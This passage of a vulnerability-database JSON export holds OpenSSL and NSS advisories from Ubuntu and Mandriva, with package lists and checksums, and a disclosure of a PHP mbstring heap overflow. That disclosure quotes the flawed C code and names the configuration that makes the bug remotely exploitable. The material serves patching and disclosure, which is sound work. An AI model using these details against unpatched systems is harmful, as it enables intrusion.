38dd4e9ab9238bdd66bd42fe8f53f938\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15ubuntu3.2_amd64.udeb\r\n Size/MD5: 621994 4e8ef6db1fb4b7335330ebb2e3ac0188\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-15ubuntu3.2_amd64.deb\r\n Size/MD5: 2101196 28b775219933b295eeb254ff74a08364\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15ubuntu3.2_amd64.deb\r\n Size/MD5: 1686326 6bfdd430777e07b06e102e3c120fa79a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-15ubuntu3.2_amd64.deb\r\n Size/MD5: 960768 933222cce7b6220071a897fa3cbecbb1\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-15ubuntu3.2_amd64.deb\r\n Size/MD5: 402120 a18cb8e948b197ec7f2757060474eabb\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15ubuntu3.2_i386.udeb\r\n Size/MD5: 578828 ede0d1d92421a60cacc90f271319d8c8\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-15ubuntu3.2_i386.deb\r\n Size/MD5: 1972610 e7cf0dc15c50431a11ae685fcad51569\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15ubuntu3.2_i386.deb\r\n Size/MD5: 5607400 162ab1a368e19489d9185e52312ae3cb\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-15ubuntu3.2_i386.deb\r\n Size/MD5: 2924196 19cdb15ddb11a0c426e6adb6bd41e1be\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-15ubuntu3.2_i386.deb\r\n Size/MD5: 397830 6e3079a7deb46074a5db1da74a3ad770\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15ubuntu3.2_lpia.udeb\r\n Size/MD5: 547496 e82a380d4daf21b12fdb88b0aa83baba\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-15ubuntu3.2_lpia.deb\r\n Size/MD5: 1949974 38a5f651601bb6726dcc96f995e70329\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15ubuntu3.2_lpia.deb\r\n Size/MD5: 1581322 a419a424594c8a209ca9c04f8a081810\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-15ubuntu3.2_lpia.deb\r\n Size/MD5: 865676 043b426830aa51ed89d525dc8f3594c8\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-15ubuntu3.2_lpia.deb\r\n Size/MD5: 399378 ca77d344e78396a2d5ba31a18e137cf6\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15ubuntu3.2_powerpc.udeb\r\n Size/MD5: 623342 7eabc3ccc743238e5e48334e74f9cbe9\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-15ubuntu3.2_powerpc.deb\r\n Size/MD5: 2112364 0bd2596ab49828f2aa9b535b295e3c27\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15ubuntu3.2_powerpc.deb\r\n Size/MD5: 1705934 b4cc9cf85194651182a2d96a8c8106c7\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-15ubuntu3.2_powerpc.deb\r\n Size/MD5: 967676 5f23e50cb072b76bfb08a4deb78c08e7\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-15ubuntu3.2_powerpc.deb\r\n Size/MD5: 401230 6ae9727fce5cdb47e363e68bc4608d0a\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15ubuntu3.2_sparc.udeb\r\n Size/MD5: 567512 1038e736dcfdaa92a0e5bc0c29fdf83b\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-15ubuntu3.2_sparc.deb\r\n Size/MD5: 2005738 69f79763b804e4fdafb9886d5b08d9db\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15ubuntu3.2_sparc.deb\r\n Size/MD5: 4040040 5949736947b083d4f63e42839aced06d\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-15ubuntu3.2_sparc.deb\r\n Size/MD5: 2287072 31f18265ec47c64bd49f992a17025786\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-15ubuntu3.2_sparc.deb\r\n Size/MD5: 405468 aaafb95a49fc00f5a8a1b5fb3f54c8a6\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2009-06-25T00:00:00", "title": "[USN-792-1] OpenSSL vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:30", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2009-06-25T00:00:00", "id": "SECURITYVULNS:DOC:22079", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22079", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:33", "references": ["https://vulners.com/securityvulns/securityvulns:doc:22079"], "description": "Multiple vulnerabilities on DTLS handling.", "edition": 1, "reporter": "BUGTRAQ", "published": "2009-06-25T00:00:00", "title": "Multiple OpenSSL DoS conditions", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:33", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "OpenSSL", "version": "0.9", "operator": "eq"}], "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2009-06-25T00:00:00", "id": "SECURITYVULNS:VULN:10014", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10014", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:28", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2008-5557 - PHP mbstring buffer overflow vulnerability\r\n\r\nCVE Number: CVE-2008-5557\r\nAuthor: Moriyoshi Koizumi &lt;mozo@mozo.jp&gt;\r\nRelease Date: 2008-12-21\r\nType: heap buffer overflow\r\nAffected Versions: 4.3.0 and later versions including PHP 5\r\nNot Affected: any version prior to 4.3.0\r\n or 5.2.7 and later versions including PHP 5.3 alpha 3\r\n\r\nOverview\r\n========\r\nPHP [1] is a scripting language extensively used in web application\r\ndevelopment. The package contains a number of language extensions aside\r\nfrom\r\nthe language core.\r\n\r\nA heap buffer overflow was found in mbstring extension [2] that is\r\nbundled in\r\nthe standard distribution. mbstring extension provides a set of\r\nfunctions for\r\nthe manipulation of multibyte / Unicode strings.\r\n\r\nThe vulnerability occurs in the part of the encoding conversion facility\r\nthat\r\ndecodes strings that contain HTML entities into Unicode strings. Due to the\r\ndecoder&#39;s incorrect handling of error conditions, the bounds check for a\r\nheap-allocated buffer is effectively bypassed. An attacker can exploit this\r\nvulnerability to transfer arbitrary data to a specific region of the heap if\r\nhe gains control over the input of the decoder.\r\n\r\n\r\nImpact\r\n======\r\nSince mbstring functions make use of the facility in various places, almost\r\nall of those can be considered vulnerable. The functions listed below\r\nshould\r\nbe particularly noted according to their primary usage:\r\n\r\n- - mb_convert_encoding&#40;&#41;\r\n- - mb_check_encoding&#40;&#41;\r\n- - mb_convert_variables&#40;&#41;\r\n- - mb_parse_str&#40;&#41;\r\n\r\nThe following functions are supposed to be safe in their nature.\r\n\r\n- - mb_decode_numericentity&#40;&#41; *\r\n- - mb_detect_encoding&#40;&#41;\r\n- - mb_detect_order&#40;&#41;\r\n- - mb_ereg&#40;&#41;\r\n- - mb_ereg_match&#40;&#41;\r\n- - mb_ereg_replace&#40;&#41;\r\n- - mb_ereg_search&#40;&#41;\r\n- - mb_ereg_search_pos&#40;&#41;\r\n- - mb_ereg_search_regs&#40;&#41;\r\n- - mb_ereg_search_init&#40;&#41;\r\n- - mb_ereg_search_getregs&#40;&#41;\r\n- - mb_ereg_search_getpos&#40;&#41;\r\n- - mb_ereg_search_setpos&#40;&#41;\r\n- - mb_ereg_set_options&#40;&#41;\r\n- - mb_eregi&#40;&#41;\r\n- - mb_eregi_replace&#40;&#41;\r\n- - mb_get_info&#40;&#41;\r\n- - mb_http_input&#40;&#41;\r\n- - mb_http_output&#40;&#41;\r\n- - mb_internal_encoding&#40;&#41;\r\n- - mb_language&#40;&#41;\r\n- - mb_list_encodings&#40;&#41;\r\n- - mb_preferred_mime_name&#40;&#41;\r\n- - mb_regex_encoding&#40;&#41;\r\n- - mb_regex_set_options&#40;&#41;\r\n- - mb_split&#40;&#41;\r\n- - mb_substitute_character&#40;&#41;\r\n\r\n&#40;*&#41; Based on the different code while providing similar functionality.\r\n\r\nBesides these scriptable functions, mbstring provides functionality that\r\nautomatically filters the form values given through a request URI or POSTed\r\ncontent. Because browsers may send characters of the form data that\r\ncannot be\r\nrepresented in the encoding used in the HTML document as HTML entities, it\r\nshould be no surprise that an user has a PHP installation configured as\r\nfollows:\r\n\r\nmbstring.encoding_translation=on\r\nmbstring.http_input=HTML-ENTITIES\r\nmbstring.internal_encoding=UTF-8\r\n\r\nThe vulnerability would be remotely exploitable in such a case.\r\n\r\n\r\nSolution\r\n========\r\nUpgrade to version 5.2.8. Note that the maintenance of 4.x series was\r\ndiscontinued.\r\n\r\n\r\nDetails\r\n=======\r\nThe following pieces are excerpts from the HTML-entity decoder code in\r\nquestion &#40;mbfilter_htmlent.c&#41;, where the decoder is implemented as a\r\ncallback function that is called against each characters of the input\r\nstring sequentially with a structure &#40;mbfl_convert_filter&#41; containing\r\nthe state of the decoder.\r\n\r\nmbfl_convert_filter has a field named &quot;output_function&quot; that points to a\r\nfunction to which the decoded data is passed on a per-character basis. The\r\nfunction is supposed to return a negative value on error. It will most\r\nlikely\r\nfail if the argument is an Unicode value that is not designated to any\r\ncharacter.\r\n\r\nIn particular, since the signature of the output_function is\r\nint&#40;*&#41;&#40;int, void *&#41; though the buffer is an array of unsigned char,\r\nevery character code that is greater than 127 gets passed to the function\r\nwith its value negated and leads to unconditional failure.\r\n\r\n-\r\n------------------------------------------------------------------------------\r\n\r\n#define CK&#40;statement&#41; do { if &#40;&#40;statement&#41; &lt; 0&#41; return &#40;-1&#41;; } while &#40;0&#41;\r\n\r\n...\r\n\r\nint mbfl_filt_conv_html_dec&#40;int c, mbfl_convert_filter *filter&#41;\r\n{\r\n if &#40;!filter-&gt;status&#41; {\r\n ...\r\n } else {\r\n if &#40;c == &#39;;&#39;&#41; {\r\n ...\r\n } else {\r\n /* add character */\r\n buffer[filter-&gt;status++] = c;\r\n /* add character and check */\r\n if &#40;!strchr&#40;html_entity_chars, c&#41; ||\r\nfilter-&gt;status+1==html_enc_buffer_size || &#40;c==&#39;#&#39; &amp;&amp; filter-&gt;status&gt;2&#41;&#41;\r\n {\r\n /* illegal character or end of buffer */\r\n if &#40;c==&#39;&amp;&#39;&#41;\r\n filter-&gt;status--;\r\n buffer[filter-&gt;status] = 0;\r\n /* php_error_docref&#40;&quot;ref.mbstring&quot; TSRMLS_CC, E_WARNING,\r\n&quot;mbstring cannot decode &#39;&#37;s&#39;&quot;, buffer&#41;l */\r\n mbfl_filt_conv_html_dec_flush&#40;filter&#41;;\r\n if &#40;c==&#39;&amp;&#39;&#41;\r\n {\r\n filter-&gt;status = 1;\r\n buffer[0] = &#39;&amp;&#39;;\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\nint mbfl_filt_conv_html_dec_flush&#40;mbfl_convert_filter *filter&#41;\r\n{\r\n int status, pos = 0;\r\n char *buffer;\r\n\r\n buffer = &#40;char*&#41;filter-&gt;opaque;\r\n status = filter-&gt;status;\r\n /* flush fragments */\r\n while &#40;status--&#41; {\r\n CK&#40;&#40;*filter-&gt;output_function&#41;&#40;buffer[pos++], filter-&gt;data&#41;&#41;;\r\n }\r\n filter-&gt;status = 0;\r\n /*filter-&gt;buffer = 0; of cause NOT*/\r\n return 0;\r\n}\r\n\r\n-\r\n------------------------------------------------------------------------------\r\n\r\nIf an invalid character sequence that contains one or more characters\r\nthat are\r\nnot amongst html_entity_chars occurs in the input, the invocation of the\r\noutput function within mbfl_filt_conv_html_dec_flush&#40;&#41; will fail and\r\ncause it\r\nto go back to the caller short of resetting filter-&gt;status because of the\r\nreturn statement in the CK&#40;&#41; macro. This eventually allows casual access to\r\nthe buffer in mbfl_filt_conv_html_dec&#40;&#41;.\r\n\r\n\r\nTimeline\r\n========\r\n2008-08 Vulnerability discovered during the investigation of bug\r\n#45722 [3]\r\n2008-09-13 Notified to the vendor via security@php.net\r\n2008-09-26 Vender responded\r\n2008-10-16 Patch committed to the repository [4]\r\n2008-12-04 PHP 5.3 alpha 3 and PHP 5.2.7 released\r\n2008-12-08 PHP 5.2.8 released\r\n2008-12-18 Reconfirmation sent to the vendor\r\n2008-12-21 Public disclosure\r\n\r\n\r\nReferences\r\n==========\r\n[1] http://php.net/\r\n[2] http://php.net/manual/ref.mbstring.php\r\n[3] http://bugs.php.net/45722\r\n[4]\r\nhttp://cvs.php.net/viewvc.cgi/php-src/ext/mbstring/libmbfl/filters/mbfilter_htmlent.c?r1=1.7&amp;r2=1.8\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAklN3SYACgkQn2kh0Fq4e4+xJwCfYB9f0Xw0ZR38l9jp7sgRlkUa\r\noH8AoJT+SxRTXGMR9egerFEFpMVHL9TC\r\n=fgEY\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "reporter": "Securityvulns", "published": "2008-12-22T00:00:00", "title": "[Full-disclosure] CVE-2008-5557 - PHP mbstring buffer overflow vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:28", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-5557"], "modified": "2008-12-22T00:00:00", "id": "SECURITYVULNS:DOC:21065", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21065", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "references": [], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:120\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : openssl\r\n Date : May 21, 2009\r\n Affected: 2008.1, 2009.0, 2009.1\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple security vulnerabilities has been identified and fixed\r\n in OpenSSL:\r\n \r\n The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k\r\n and earlier 0.9.8 versions allows remote attackers to cause a denial\r\n of service &#40;memory consumption&#41; via a large series of future epoch\r\n DTLS records that are buffered in a queue, aka DTLS record buffer\r\n limitation bug. &#40;CVE-2009-1377&#41;\r\n \r\n Multiple memory leaks in the dtls1_process_out_of_seq_message function\r\n in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow\r\n remote attackers to cause a denial of service &#40;memory consumption&#41;\r\n via DTLS records that &#40;1&#41; are duplicates or &#40;2&#41; have sequence numbers\r\n much greater than current sequence numbers, aka DTLS fragment handling\r\n memory leak. &#40;CVE-2009-1378&#41;\r\n \r\n The updated packages have been patched to prevent this.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.1:\r\n 9492fe3bf022be9f7529e594844033d4 2008.1/i586/libopenssl0.9.8-0.9.8g-4.4mdv2008.1.i586.rpm\r\n 54166454819e21289e49a6e2986e7f30 2008.1/i586/libopenssl0.9.8-devel-0.9.8g-4.4mdv2008.1.i586.rpm\r\n 0ee9a01df9bc622268eb052400433de7 2008.1/i586/libopenssl0.9.8-static-devel-0.9.8g-4.4mdv2008.1.i586.rpm\r\n b681fd12d6cd2bdbb85d1726b2db4a99 2008.1/i586/openssl-0.9.8g-4.4mdv2008.1.i586.rpm \r\n 217fe6c6af5265755ec2105b1f3bebaf 2008.1/SRPMS/openssl-0.9.8g-4.4mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2008.1/X86_64:\r\n 6409f96a04a2d3946a1b72f63a868e5d 2008.1/x86_64/lib64openssl0.9.8-0.9.8g-4.4mdv2008.1.x86_64.rpm\r\n d00a048d4d263f28539171f89d5de1e8 2008.1/x86_64/lib64openssl0.9.8-devel-0.9.8g-4.4mdv2008.1.x86_64.rpm\r\n 03bbd2a59f8bc5f0d1d6cb54736f024c 2008.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8g-4.4mdv2008.1.x86_64.rpm\r\n 797c40fa3bd86009061423713e2292c5 2008.1/x86_64/openssl-0.9.8g-4.4mdv2008.1.x86_64.rpm \r\n 217fe6c6af5265755ec2105b1f3bebaf 2008.1/SRPMS/openssl-0.9.8g-4.4mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n 94d6f4be3c42586813be16a2270c89bf 2009.0/i586/libopenssl0.9.8-0.9.8h-3.3mdv2009.0.i586.rpm\r\n 59e4214a9e5d703a88e5c695adf498b9 2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.3mdv2009.0.i586.rpm\r\n 3819b2efba54362f7e8e4a821254f258 2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.3mdv2009.0.i586.rpm\r\n ecd5bea8f1fe9dd6b4e8506c0b0705ae 2009.0/i586/openssl-0.9.8h-3.3mdv2009.0.i586.rpm \r\n c4354a0c28d3e83b9ff529a70bede4bd 2009.0/SRPMS/openssl-0.9.8h-3.3mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n e3c14742691a67f21ed7a7c9abe775a2 2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.3mdv2009.0.x86_64.rpm\r\n b2bc687de0793a6c14649fa68c7d043b 2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.3mdv2009.0.x86_64.rpm\r\n 76f91d3544039f65b77894a86a45e09c 2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.3mdv2009.0.x86_64.rpm\r\n 418ef4a5a9a24fc8437baf75d8c12944 2009.0/x86_64/openssl-0.9.8h-3.3mdv2009.0.x86_64.rpm \r\n c4354a0c28d3e83b9ff529a70bede4bd 2009.0/SRPMS/openssl-0.9.8h-3.3mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n 9c46d7da9fb61cef36532ea0c25fd881 2009.1/i586/libopenssl0.9.8-0.9.8k-1.1mdv2009.1.i586.rpm\r\n 7a984a72c9b2c7b0549dabf4f7b353fd 2009.1/i586/libopenssl0.9.8-devel-0.9.8k-1.1mdv2009.1.i586.rpm\r\n 0e8b58b6e02958d05d19e78d9725cd45 2009.1/i586/libopenssl0.9.8-static-devel-0.9.8k-1.1mdv2009.1.i586.rpm\r\n a32d8acd870490b6efba309da6dce043 2009.1/i586/openssl-0.9.8k-1.1mdv2009.1.i586.rpm \r\n 7b9c16777f3e88674fb65d0c28df10ff 2009.1/SRPMS/openssl-0.9.8k-1.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 8f3c93a2af5e8950bbc3846fc7f90568 2009.1/x86_64/lib64openssl0.9.8-0.9.8k-1.1mdv2009.1.x86_64.rpm\r\n 8573eab7fdffff97807255dc91154abc 2009.1/x86_64/lib64openssl0.9.8-devel-0.9.8k-1.1mdv2009.1.x86_64.rpm\r\n a557449ae9983495e61eabaeb5300895 2009.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8k-1.1mdv2009.1.x86_64.rpm\r\n 99f346d65571efb2c4142aab5f074038 2009.1/x86_64/openssl-0.9.8k-1.1mdv2009.1.x86_64.rpm \r\n 7b9c16777f3e88674fb65d0c28df10ff 2009.1/SRPMS/openssl-0.9.8k-1.1mdv2009.1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFKFVC5mqjQ0CJFipgRAtM8AJ4rG/qVR2mmrgw4dKgmbxz/d18zMQCfa/qL\r\np/lIHdhpygpSxPt6iwyKWI4=\r\n=tZ5R\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2009-05-21T00:00:00", "title": "[ MDVSA-2009:120 ] openssl", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:30", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1377", "CVE-2009-1378"], "modified": "2009-05-21T00:00:00", "id": "SECURITYVULNS:DOC:21866", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21866", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:33", "references": ["https://vulners.com/securityvulns/securityvulns:doc:21866"], "description": "Memory corruptions, memory leaks.", "edition": 1, "reporter": "BUGTRAQ", "published": "2009-05-21T00:00:00", "title": "OpenSSL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:33", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "OpenSSL", "version": "0.9", "operator": "eq"}], "cvelist": ["CVE-2009-1377", "CVE-2009-1378"], "modified": "2009-05-21T00:00:00", "id": "SECURITYVULNS:VULN:9925", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9925", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:31", "references": ["https://vulners.com/securityvulns/securityvulns:doc:21065"], "description": "Buffer overflows in mb_* functions.", "edition": 1, "reporter": "FULL-DISCLOSURE", "published": "2008-12-22T00:00:00", "title": "PHP 4 multiple function buffer overflows", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:31", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PHP", "version": "4.3", "operator": "eq"}], "cvelist": ["CVE-2008-5557"], "modified": "2008-12-22T00:00:00", "id": "SECURITYVULNS:VULN:9537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9537", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:50", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1378", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1387", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1379", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1386", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1377"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "0.9.8g-10.1ubuntu2.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libssl0.9.8", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "0.9.8g-15ubuntu3.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libssl0.9.8", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "0.9.8g-4ubuntu3.7", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libssl0.9.8", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "0.9.8a-7ubuntu0.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libssl0.9.8", "operator": "lt"}], "description": "It was discovered that OpenSSL did not limit the number of DTLS records it would buffer when they arrived with a future epoch. A remote attacker could cause a denial of service via memory resource consumption by sending a large number of crafted requests. (CVE-2009-1377)\n\nIt was discovered that OpenSSL did not properly free memory when processing DTLS fragments. A remote attacker could cause a denial of service via memory resource consumption by sending a large number of crafted requests. (CVE-2009-1378)\n\nIt was discovered that OpenSSL did not properly handle certain server certificates when processing DTLS packets. A remote DTLS server could cause a denial of service by sending a message containing a specially crafted server certificate. (CVE-2009-1379)\n\nIt was discovered that OpenSSL did not properly handle a DTLS ChangeCipherSpec packet when it occured before ClientHello. A remote attacker could cause a denial of service by sending a specially crafted request. (CVE-2009-1386)\n\nIt was discovered that OpenSSL did not properly handle out of sequence DTLS handshake messages. A remote attacker could cause a denial of service by sending a specially crafted request. (CVE-2009-1387)", "edition": 3, "reporter": "Ubuntu", "published": "2009-06-25T00:00:00", "title": "OpenSSL vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2009-06-25T00:00:00", "id": "USN-792-1", "href": "https://usn.ubuntu.com/792-1/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:51", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3555", "https://usn.ubuntu.com/usn/usn-927-1"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "3.12.6-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libnss3-1d", "operator": "lt"}], "description": "USN-927-1 fixed vulnerabilities in NSS on Ubuntu 9.10. This update provides the corresponding updates for Ubuntu 9.04.\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user\u2019s session. This update adds support for the new new renegotiation extension and will use it when the server supports it.", "edition": 3, "reporter": "Ubuntu", "published": "2010-07-23T00:00:00", "title": "NSS vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "modified": "2010-07-23T00:00:00", "id": "USN-927-6", "href": "https://usn.ubuntu.com/927-6/", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:51", "references": ["https://usn.ubuntu.com/usn/usn-990-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3555"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.2.11-2ubuntu2.7", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2.2-common", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.2.8-1ubuntu0.18", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2.2-common", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.2.14-5ubuntu8.2", "arch": "noarch", "packageFilename": "UNKNOWN", 